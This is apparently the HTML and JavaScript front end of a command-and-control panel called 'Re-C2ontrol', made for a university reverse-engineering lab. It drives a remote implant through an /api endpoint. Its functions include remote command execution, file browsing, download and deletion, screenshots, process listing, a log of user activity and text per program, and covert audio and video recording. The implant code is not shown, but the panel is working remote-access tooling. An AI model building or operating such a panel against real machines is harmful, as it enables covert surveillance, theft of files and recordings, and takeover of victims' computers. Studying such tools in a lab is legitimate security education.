<!DOCTYPE html>
<html>
<head>
    <title>Re-C2ontrol</title>
    <link rel="stylesheet" type="text/css" href="web/sup.css"/>
    <link rel="icon" type="image/x-icon" href="web/favicon.ico">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta charset="UTF-8">
    <style>
        /* Sidebar styling */
        .sidebar {
            display: flex;
            flex-direction: column;
            background-color: #222;
            padding: 10px;
            width: 200px;
        }

        /* Button styling */
        .sidebar button {
            background-color: crimson;
            color: white;
            border: none;
            padding: 10px;
            margin: 5px 0;
            cursor: pointer;
            font-size: 16px;
            transition: background-color 0.3s;
        }

        /* Style for hover effect on non-active buttons */
        .sidebar button:not(.active):hover {
            background-color: #cc0000;
        }

        /* Active button styling (no hover effect) */
        .sidebar button.active {
            background-color: darkred;
            font-weight: bold;
            border-left: 5px solid #ff6347;
        }

        /* Content layout */
        .content {
            display: flex;
            gap: 20px;
            padding: 20px;
        }

        /* Main panel styling */
        .main-panel {
            flex: 1;
            background-color: #333;
            color: white;
            padding: 20px;
            border-radius: 5px;
            position: relative;
        }

        /* Tab content styling */
        .tab-content {
            display: none; /* Hide all tab content by default */
        }

        .tab-content.active {
            display: block; /* Show only the active tab content */
        }

        /* Screenshot button styling */
        .screenshot-button {
            background-color: crimson;
            color: white;
            border: none;
            padding: 8px;
            font-size: 16px;
            cursor: pointer;
            transition: background-color 0.3s;
        }

        .screenshot-button:hover {
            background-color: #cc0000;
        }

        .blocked {
            background-color: darkred;
            cursor: not-allowed;
        }

        .blocked:hover {
            background-color: darkred;
            transform: none; /* Відключаємо масштабування */
        }

        /* Screenshot container */
        .screenshot-container {
            margin-top: 20px;
        }

        img {
            max-width: 100%;
            height: auto;
            /* border: 1px solid #fff; */
            border-radius: 5px;
        }

        /* Bottpanel styling */
        /*
        .bottpanel {
            background-color: #222;
            color: white;
            text-align: center;
            padding: 10px;
            margin-top: 20px;
        }*/
        .system-info {
            /* display: grid;
            grid-template-columns: 1fr 2fr; */
            gap: 10px;
            padding: 20px;
            /* border-radius: 5px;
            background-color: #444;
            color: white; */
        }

        .info-item {
            display: flex;
            align-items: center;
        }

        .info-item i {
            font-size: 24px;
            margin-right: 10px;
            padding-bottom: 10px;
            font-style: normal;
        }

        .info-title {
            font-weight: bold;
        }
        .terminal {
            background-color: #0f0f0ff3;
            color: #00ff00;
            font-family: monospace;
            padding: 20px;
            border-radius: 8px;
            height: 500px;
            overflow-y: auto;
            display: flex;
            flex-direction: column;
            justify-content: flex-end;
        }

        .terminal-output {
            flex: 1;
            overflow-y: auto;
            margin-bottom: 10px;
            white-space: pre-wrap;
        }

        .terminal-input {
            display: flex;
            align-items: center;
        }

        .prompt {
            color: #00ff00;
            margin-right: 5px;
        }

        .terminal input[type="text"] {
            background-color: transparent;
            color: #00ff00;
            border: none;
            outline: none;
            font-family: monospace;
            width: 100%;
        }

        .terminal input[type="text"]::placeholder {
            color: #00ff00;
            opacity: 0.5;
        }

        .terminal input[type="text"]:focus {
            outline: none;
        }
        #fileExplorer, #processExplorer {
            border: 1px solid #ccc;
            padding: 10px;
            /* max-width: 1000px; */
            margin: auto;
            overflow-y: auto;
            background-color: #000;
        }
        #path {
            font-weight: bold;
            margin-bottom: 10px;
        }
        .item {
            padding: 5px;
            cursor: pointer;
            display: flex;
            justify-content: space-between;
        }
        .item:hover {
            background-color: #ffff002c;
        }
        .directory {
            color: #00ffff;
            font-weight: bold;
        }
        .file {
            color: #00ff00;
        }
        button {
            margin: 5px 0;
        }
        .item .name {
    flex: 4; /* Larger width for name */
}

.item .size {
    flex: 1; /* Medium width for size */
    text-align: left;
}

.item .created {
    flex: 1.5; /* Medium width for created date */
    text-align: left;
}

table { width: 100%; border-collapse: collapse; }
        th, td { padding: 8px; cursor: pointer; }
        th { background-color: crimson; }
		        td:nth-child(2) { /* Застосовується до стовпця Текст */
            max-width: 300px; /* Встановлення максимальної ширини для стовпця Текст */
            word-break: break-word; /* Розрив слів при досягненні межі */
            overflow-wrap: break-word; /* Перенесення тексту */
            white-space: pre-wrap;
        }
		        /* Мінімальна ширина для інших стовпців */
        th:not(:nth-child(2)), td:not(:nth-child(2)) {
            white-space: nowrap; /* Запобігання переносу тексту */
            width: 3%; /* Мінімальна ширина, щоб не займати зайвий простір */
        }
    </style>
</head>
<body>
    <div class="topnav">
        <img class="logo" src="web/favicon.ico" alt="Logo">
        <a href="index.php">Adverts</a>
        <a href="upd-form.php">+Advert</a>
        <a href="admin.php">Admin</a>
        <a class="active" href="video.html">Video</a>
        <a href="contact.html">Contacts</a>
    </div>

    <div class="content">
        <div class="sidebar">
            <button id="sysinfoButton" onclick="openTab('sysinfo', this)">System Information</button>
            <button onclick="openTab('fileExplorer', this)">File Explorer</button>
            <button onclick="openTab('screenshot', this)">Make Screenshot</button>
            <button onclick="openTab('processExplorer', this)">Process Explorer</button>
            <button onclick="openTab('cmd', this)">Command line</button>
            <button onclick="openTab('user_activity', this)">User Activity</button>
            <button onclick="openTab('camera', this)">Camera</button>
            <!-- <button onclick="openTab('process', this)">Process Enumeration</button>
            <button onclick="openTab('filesystem', this)">Filesystem Discovery</button>
            <button onclick="openTab('clipboard', this)">Clipboard Data</button>
            <button onclick="openTab('delete', this)">Delete File</button> -->
        </div>

        <div class="main-panel">
            <div id="sysinfo" class="tab-content active">
                <h2>System Information</h2>
                <div class="system-info" id="systemInfoContainer">
                    <!-- System info will be populated here -->
                </div>
            </div>
            <div id="fileExplorer" class="tab-content">
                <div id="path">Current Path: /</div>
                <div id="content"></div>
                <button class="screenshot-button" onclick="goBack()">Go Back</button>
            </div>
            <div id="screenshot" class="tab-content">
                <button class="screenshot-button" onclick="takeScreenshot()">Take Screenshot</button>
                <div class="screenshot-container">
                    <img id="screenshotImage" src="" alt="Screenshot will appear here" style="display:none;">
                    <p id="screenshotError"></p>
                </div>
            </div>
            <div id="processExplorer" class="tab-content">
                <div class="item" id="path">
                    <span class="name">Name</span>
                    <span class="size">User</span>
                    <span class="created">Pid</span>
                </div>
                <div id="proc_content"></div>
            </div>
            <div id="cmd" class="tab-content">
                <div class="terminal">
                    <div class="terminal-output" id="terminal-output"></div>
                    <div class="terminal-input">
                        <span class="prompt">$</span>
                        <input type="text" id="command-input" placeholder="Enter command" />
                    </div>
                </div>
            </div>
            
            <div id="user_activity" class="tab-content">
                <h2>User logs</h2>
                <table id="logsTable">
                    <thead>
                        <tr>
                            <th data-sort="ppath">Program</th>
                            <th>Text</th>
                            <th data-sort="time">Time</th>
                            <th data-sort="type">Type</th>
                        </tr>
                    </thead>
                    <tbody id="logsBody"></tbody>
                </table>
            </div>
            <div id="camera" class="tab-content">
                <h2>Camera</h2>
                <div class="button-container">
                    <button id="start_record_audio" class="screenshot-button" onclick="startaudio()">Start record audio</button>
                    <button id="stop_record_audio" class="screenshot-button" onclick="stopaudio()">Stop record audio</button>
                    <button id="record_video_b" class="screenshot-button" onclick="record_video()">Record video</button>
                </div>
            </div>
        </div>
    </div>

    <div class="bottpanel">
        <h2>kpi_re | Lab №4 | <a href="https://kpi.ua/">KPI University</a></h2>
    </div>

    <script>
        let currentPath = '/';
        let f_explorer = 1;
        let sysinfo = 1;
        let screensh = 1;

        function openTab(tabId, button) {
            // Hide all tab content
            const contents = document.querySelectorAll('.tab-content');
            contents.forEach(content => content.classList.remove('active'));

            // Show the selected tab content
            const activeTab = document.getElementById(tabId);
            activeTab.classList.add('active');

            // Remove active class from all buttons
            const buttons = document.querySelectorAll('.sidebar button');
            buttons.forEach(btn => btn.classList.remove('active'));

            // Add active class to the current button
            button.classList.add('active');
            
            switch(tabId) {
                case 'sysinfo':
                    if (sysinfo) {
                        fetchSystemInfo();
                    }
                    break;
                case 'fileExplorer':
                    if (f_explorer) {
                        fetchFolderContents(currentPath);
                    }
                    break;
                case 'screenshot':
                    if (screensh) {
                        takeScreenshot();
                    }
                    break;
                case 'processExplorer': 
                    fetchProcessContents();
                    break;
                case 'user_activity':
                    display_logs();
                    break;
                case 'camera':
                    check_record_status();
                break;
            }
        }

        function fetchSystemInfo() {
            fetch('/api', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({ action: 'get_system_info' })

            })
            .then(response => response.json())
            .then(data => {
                if (data.status === "OK") {
                    sysinfo = 0;
                    if (data.systemName.toLowerCase().includes("windows")) {
                        currentPath = "c:/";
                    }
                    const systemInfoContainer = document.getElementById('systemInfoContainer');
                    systemInfoContainer.innerHTML = ''; // Clear existing info

                    // Populate the system info
                    const infoItems = [
                        { title: 'OS Name', value: data.systemName, icon: '💻' },
                        { title: 'Username', value: data.username, icon: '👤' },
                        { title: 'Processor', value: data.processor, icon: '🧠' },
                        { title: 'System Architecture', value: data.architecture, icon: '🔧' },
                        { title: 'Graphics Processor', value: data.gpu, icon: '🎮' },
                        { title: 'RAM Size', value: data.ram, icon: '🧮' },
                        { title: 'Disk Size / Free Space', value: `${data.diskSize} / ${data.freeSpace}`, icon: '💾' },
                        { title: 'Screen Size', value: data.screenSize, icon: '📺' },
                        { title: 'Device Type', value: data.deviceType, icon: '📱' },
                        { title: 'Hostname', value: data.hostname, icon: '🏷️' },
                        { title: 'Local IP Address', value: data.localIp, icon: '🌐' },
                        { title: 'System Language', value: data.language, icon: '🈯' },

                    ];

                    infoItems.forEach(item => {
                        const infoItem = document.createElement('div');
                        infoItem.className = 'info-item';
                        infoItem.innerHTML = `<i>${item.icon}</i><span class="info-title">${item.title}:</span>&nbsp;${item.value}`;
                        systemInfoContainer.appendChild(infoItem);
                    });
                } else {
                    const hsysinfoError = document.getElementById('sysinfoError');
                    if (hsysinfoError) {
                        hsysinfoError.textContent = data.message;
                    } else {
                        const infoItem = document.createElement('p');
                        infoItem.id = 'sysinfoError';
                        infoItem.style.display = 'block';
                        infoItem.textContent = data.message;
                        systemInfoContainer.appendChild(infoItem);                        
                    }
                }
            })
            .catch(error => {
                console.error('Error fetching system info:', error);
            });
        }

        function takeScreenshot() {
            fetch('/api', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({ action: 'take_screenshot' })
            })
            .then(response => response.json())
            .then(data => {
                if (data.status === "OK") {
                    screensh = 0;
                    const imgElement = document.getElementById('screenshotImage');
                    imgElement.src = data.screenshot;
                    imgElement.style.display = 'block';

                    const errorElement = document.getElementById("screenshotError");
                    errorElement.style.display = 'none';
                } else {
                    console.error('Error:', data.message);
                    const errorElement = document.getElementById("screenshotError");
                    errorElement.innerText = data.message;
                    errorElement.style.display = 'block';

                    const imgElement = document.getElementById('screenshotImage');
                    imgElement.style.display = 'none';
                }
            })
            .catch(error => {
                console.error('Error taking screenshot:', error);
            });
        }
        window.onload = function() {
            openTab('sysinfo', document.getElementById('sysinfoButton'));
        };
        const commandHistory = []; // Масив для зберігання історії команд
        let historyIndex = -1; // Індекс для відстеження поточної команди в історії

        document.getElementById('command-input').addEventListener('keypress', function(e) {
            if (e.key === 'Enter') {
                const _command = e.target.value;
                const output = document.getElementById('terminal-output');

                // Запам'ятовуємо команду в історії
                if (_command.trim() !== '' && commandHistory.at(-1) !== _command.trim()) {
                    commandHistory.push(_command);
                    historyIndex = commandHistory.length; // Скидаємо індекс
                }

                // Відображення команди у вихідному вікні
                const commandLine = document.createElement('div');
                commandLine.textContent = `$ ${_command}`;
                output.appendChild(commandLine);

                // Очищення введення
                e.target.value = '';

                // Перевірка на команду clear
                if (_command.trim() === 'clear') {
                    // Очищення області виходу терміналу
                    output.innerHTML = '';
                } else if(_command.trim() === '') {
                    
                } else {
                    fetch('/api', {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json'
                        },
                        body: JSON.stringify({ action: 'exec_com', command: _command })
                    })
                    .then(response => response.json())
                    .then(data => {
                        const responseLine = document.createElement('div');

                        if (data.status === "OK") {
                            responseLine.textContent = data.output;
                        } else {
                            responseLine.textContent = `Server response: ${data.message}`;
                        }
                        output.appendChild(responseLine);                             
                        
                    });
                }

                // Прокрутка до низу
                setTimeout(() => {
                    output.scrollTop = output.scrollHeight;
                }, 100);
            }
        });

        // Обробка натискань клавіш для стрілок
        document.getElementById('command-input').addEventListener('keydown', function(e) {
            if (e.key === 'ArrowUp') {
                // Якщо індекс більше 0, переміщаємося вгору в історії
                if (historyIndex > 0) {
                    historyIndex--;
                    e.target.value = commandHistory[historyIndex];
                }
                e.preventDefault(); // Зупиняємо стандартну поведінку
            } else if (e.key === 'ArrowDown') {
                // Якщо індекс менший за довжину історії, переміщаємося вниз
                if (historyIndex < commandHistory.length - 1) {
                    historyIndex++;
                    e.target.value = commandHistory[historyIndex];
                } else {
                    historyIndex = commandHistory.length; // Скидаємо індекс, щоб очистити введення
                    e.target.value = '';
                }
                e.preventDefault(); // Зупиняємо стандартну поведінку
            }
        });

        async function fetchFolderContents(dir) {
            try {
                const response = await fetch('/api', {
                    method: 'POST',
                    headers: { 'Content-Type': 'application/json' },
                    body: JSON.stringify({ action: 'dir_list', dir })
                });
                const data = await response.json();
                displayContents(data);
            } catch (error) {
                console.error('Error fetching folder contents:', error);
            }
        }

        function displayContents(data) {
            const contentDiv = document.getElementById('content');
            contentDiv.innerHTML = '';
            if (data.status === "OK") {
                f_explorer = 0;
                document.getElementById('path').innerText = `Current Path: ${currentPath}`;

                data.dirs.forEach(dir => {
                    const dirDiv = document.createElement('div');
                    dirDiv.className = 'item directory';
                    dirDiv.innerText = dir.name;
                    dirDiv.onclick = () => openDirectory(dir.name);
                    contentDiv.appendChild(dirDiv);
                });

                data.files.forEach(file => {
                    const fileDiv = document.createElement('div');
                    fileDiv.className = 'item file';
                    fileDiv.innerHTML = `
                    <span class="name">${file.name}</span>
                    <span class="size">${formatFileSize(file.size)}</span>
                    <span class="created">${file.create_date}</span>
                        <span>
                            <button class="screenshot-button" onclick="downloadFile('${file.name}')">📥</button>
                            <button class="screenshot-button" onclick="deleteFile('${file.name}')">🗑️</button>
                        </span>`;
                    contentDiv.appendChild(fileDiv);
                });                
            } else {
                const hsysinfoError = document.getElementById('fileExplorerError');
                    if (hsysinfoError) {
                        hsysinfoError.textContent = data.message;
                    } else {
                        const infoItem = document.createElement('p');
                        infoItem.id = 'fileExplorerError';
                        infoItem.style.display = 'block';
                        infoItem.textContent = data.message;
                        contentDiv.appendChild(infoItem);                        
                    }
            }

        }

    function formatFileSize(bytes) {
        const sizes = ['Bytes', 'KB', 'MB', 'GB', 'TB'];
        if (bytes === 0) return '0 Bytes';
        const i = parseInt(Math.floor(Math.log(bytes) / Math.log(1024)), 10);
        return `${(bytes / Math.pow(1024, i)).toFixed(2)} ${sizes[i]}`;
    }

        function openDirectory(dirName) {
            currentPath += `${dirName}/`;
            fetchFolderContents(currentPath);
        }

        function goBack() {
            if (currentPath !== '/' && currentPath !== "c:/") {
                currentPath = currentPath.split('/').slice(0, -2).join('/') + '/';
                fetchFolderContents(currentPath);
            }
        }

        async function downloadFile(fileName) {
            try {

                fetch('/api', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify({ action: 'save_file', path: currentPath + fileName})
                })
                .then(response => response.json())
                .then(data => {
                    if (data.status === 'OK') {
                        // window.location.href = data.url;
                        const downloadLink = document.createElement('a');
                        downloadLink.href = data.url; // URL from the response (e.g., '/artifacts/andr.crt')
                        downloadLink.download = data.url.split('/').pop(); // Extract file name from the URL for the download
                        document.body.appendChild(downloadLink);
                        downloadLink.click();
                        document.body.removeChild(downloadLink);
                    }
                });
            } catch (error) {
                console.error('Error downloading file:', error);
            }
        }

        async function deleteFile(fileName) {
            if (confirm(`Delete file: ${fileName}?`)) {
                try {
                    await fetch('/api', {
                        method: 'POST',
                        headers: { 'Content-Type': 'application/json' },
                        body: JSON.stringify({ action: 'del_file', path: currentPath + fileName })
                    })
                    .then(response => response.json())
                    .then(data => {
                        alert(`Status action: ${data.status}`);
                    });
                    fetchFolderContents(currentPath);
                } catch (error) {
                    console.error('Error deleting file:', error);
                }
            }

        }

        async function fetchProcessContents() {
            try {
                const response = await fetch('/api', {
                    method: 'POST',
                    headers: { 'Content-Type': 'application/json' },
                    body: JSON.stringify({ action: 'proc_info'})
                });
                const data = await response.json();
                displayProcess(data);
            } catch (error) {
                console.error('Error fetching folder contents:', error);
            }
        }

        function displayProcess(data) {
            const contentDiv = document.getElementById('proc_content');
            contentDiv.innerHTML = '';

            if (data.status === "OK") {
                data.proc.forEach(proc => {
                    const fileDiv = document.createElement('div');
                    fileDiv.className = 'item file';
                    fileDiv.innerHTML = `
                    <span class="name">${proc.proc_name}</span>
                    <span class="size">${proc.user}</span>
                    <span class="created">${proc.pid}</span>
                    `
                    contentDiv.appendChild(fileDiv);
                });                
            } else {
                const hsysinfoError = document.getElementById('processExplorerError');
                    if (hsysinfoError) {
                        hsysinfoError.textContent = data.message;
                    } else {
                        const infoItem = document.createElement('p');
                        infoItem.id = 'processExplorerError';
                        infoItem.style.display = 'block';
                        infoItem.textContent = data.message;
                        contentDiv.appendChild(infoItem);                        
                    }
            }

        }

        let logs;
        // Initialize by loading root directory
        let sortOrder = {};        //fetchFolderContents(currentPath);
        function display_logs() {
            fetch('/api', {
                method: 'POST',
                headers: { 'Content-Type': 'application/json' },
                body: JSON.stringify({action: 'get_logs'})
            })
            .then(response => response.text())
            .then(data => {
                const logsBody = document.getElementById("logsBody");
                logsBody.innerHTML = ""; // Очищення таблиці

                const lines = data.trim().split('\n');
                // Перетворюємо кожен рядок у JSON-об'єкт
                logs = lines.map(line => JSON.parse(line));
                renderLogs();
            })
        }

        function renderLogs() {
            const logsBody = document.getElementById("logsBody");
            logsBody.innerHTML = ""; // Очищення таблиці

            logs.forEach(log => {
                const row = document.createElement("tr");

                ["ppath", "text", "time", "type"].forEach(field => {
                    const cell = document.createElement("td");
                    cell.textContent = log[field];
                    row.appendChild(cell);
                });
                logsBody.appendChild(row);
            });
        }

        function sortLogs(column) {
            // Перевірка порядку сортування: зростаючий чи спадний
            sortOrder[column] = sortOrder[column] === 'asc' ? 'desc' : 'asc';
            const direction = sortOrder[column] === 'asc' ? 1 : -1;

            logs.sort((a, b) => {
                if (a[column] < b[column]) return -1 * direction;
                if (a[column] > b[column]) return 1 * direction;
                return 0;
            });

            renderLogs(); // Перерисовуємо таблицю з новим порядком
        }

        // Додаємо подію натискання на заголовки для сортування
        document.querySelectorAll("th[data-sort]").forEach(header => {
            header.addEventListener("click", () => {
                const column = header.getAttribute("data-sort");
                sortLogs(column);
            });
        });

        function startaudio() {
            if (confirm(`Start record audio?`)) {
                fetch('/api', {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json'
                        },
                        body: JSON.stringify({ action: 'start_record_audio' })
                    })
                    .then(response => response.json())
                    .then(data => {
                        if (data.status === true) {
                            alert(`Record started`);
                        } else {
                            alert(`Failed to start recording`);
                        }
                    })
                    .finally(() => {
                        check_record_status();                    
                    });                
            }
        };

        function stopaudio() {
            try {
                fetch('/api', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify({ action: 'stop_record_audio'})
                })
                .then(response => response.json())
                .then(data => {
                    if (data.status === 'OK') {
                        // window.location.href = data.url;
                        // const downloadLink = document.createElement('a');
                        // downloadLink.href = data.url; // URL from the response (e.g., '/artifacts/andr.crt')
                        // downloadLink.download = data.url.split('/').pop(); // Extract file name from the URL for the download
                        // document.body.appendChild(downloadLink);
                        // downloadLink.click();
                        // document.body.removeChild(downloadLink);
                        check_record_status();
                        addAudioPlayer(data.url);
                    }
                });
                } catch (error) {
                console.error('Error downloading wav file:', error);
            }
        }

        let rec_aud_status;
        function check_record_status() {
            try {
                fetch('/api', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify({ action: 'check_record_status'})
                })
                .then(response => response.json())
                .then(data => {
                    rec_aud_status = data.status;
                    let button = document.getElementById("stop_record_audio");
                    let button2 = document.getElementById("start_record_audio");
                    let button3 = document.getElementById("record_video_b");


                    if (data.status === "error") {
                        button.disabled = true;
                        button.classList.add("blocked");
                        button2.disabled = true;
                        button2.classList.add("blocked");
                        button3.disabled = true;
                        button3.classList.add("blocked");
                    } else {
                        button3.disabled = false;
                        button3.classList.remove("blocked");
                        if (data.status) {
                            button.disabled = false;
                            button.classList.remove("blocked");
                            button2.disabled = true;
                            button2.classList.add("blocked");  
                        } else {
                            button2.disabled = false;
                            button2.classList.remove("blocked");
                            button.disabled = true;
                            button.classList.add("blocked");                        
                        }                        
                    }


                });
                } catch (error) {
                console.error('Error downloading wav file:', error);
            }
        }

        function record_video() {
            if (confirm(`Start record video?`)) {
            let button = document.getElementById("record_video_b");
            button.disabled = true;
            button.classList.add("blocked");
            try {
                fetch('/api', {
                    method: 'POST',
                    headers: {
                        'Content-Type': 'application/json'
                    },
                    body: JSON.stringify({ action: 'record_video'})
                })
                .then(response => response.json())
                .then(data => {
                    if (data.status === 'OK') {
                        // window.location.href = data.url;
                        const downloadLink = document.createElement('a');
                        downloadLink.href = data.url; // URL from the response (e.g., '/artifacts/andr.crt')
                        downloadLink.download = data.url.split('/').pop(); // Extract file name from the URL for the download
                        document.body.appendChild(downloadLink);
                        downloadLink.click();
                        document.body.removeChild(downloadLink);
                        check_record_status();
                    }
                })
                .finally(() => {
                    // Розблокування кнопки після завершення запиту (успішно чи ні)
                    button.disabled = false;
                    button.classList.remove("blocked");
                });
                } catch (error) {
                console.error('Error downloading wav file:', error);
            }
        }
        }

        function addAudioPlayer(audioPath) {
            const cameraDiv = document.getElementById("camera");

            // Перевіряємо, чи вже є плеєр
            let existingPlayer = document.getElementById("audioPlayer");
            if (existingPlayer) {
                // Якщо є, просто змінюємо джерело аудіо
                existingPlayer.querySelector("source").src = audioPath;
                existingPlayer.load(); // Перезавантажуємо аудіо
            } else {
                // Створюємо новий плеєр
                const audioPlayer = document.createElement("audio");
                audioPlayer.id = "audioPlayer";
                audioPlayer.controls = true; // Додаємо елементи управління

                const source = document.createElement("source");
                source.src = audioPath; // Вказуємо шлях до аудіо
                source.type = "audio/mpeg"; // Тип файлу

                audioPlayer.appendChild(source);
                cameraDiv.appendChild(audioPlayer); // Додаємо плеєр до div
            }
        }

    </script>
</body>
</html>


<!-- fetch('/api', {
    method: 'POST',
    headers: {
        'Content-Type': 'application/json'
    },
    body: JSON.stringify({ action: 'take_screenshot' })
})
.then(response => response.json())
.then(data => {
    if (data.status === "OK") {
        const imgElement = document.getElementById('screenshotImage');
        imgElement.src = data.screenshot;
        imgElement.style.display = 'block';

        const errorElement = document.getElementById("screenshotError");
        errorElement.style.display = 'none';
    } else {
        console.error('Error:', data.message);
        const errorElement = document.getElementById("screenshotError");
        errorElement.innerText = data.message;
        errorElement.style.display = 'block';

        const imgElement = document.getElementById('screenshotImage');
        imgElement.style.display = 'none';
    }
})
.catch(error => {
    console.error('Error taking screenshot:', error);
});
} -->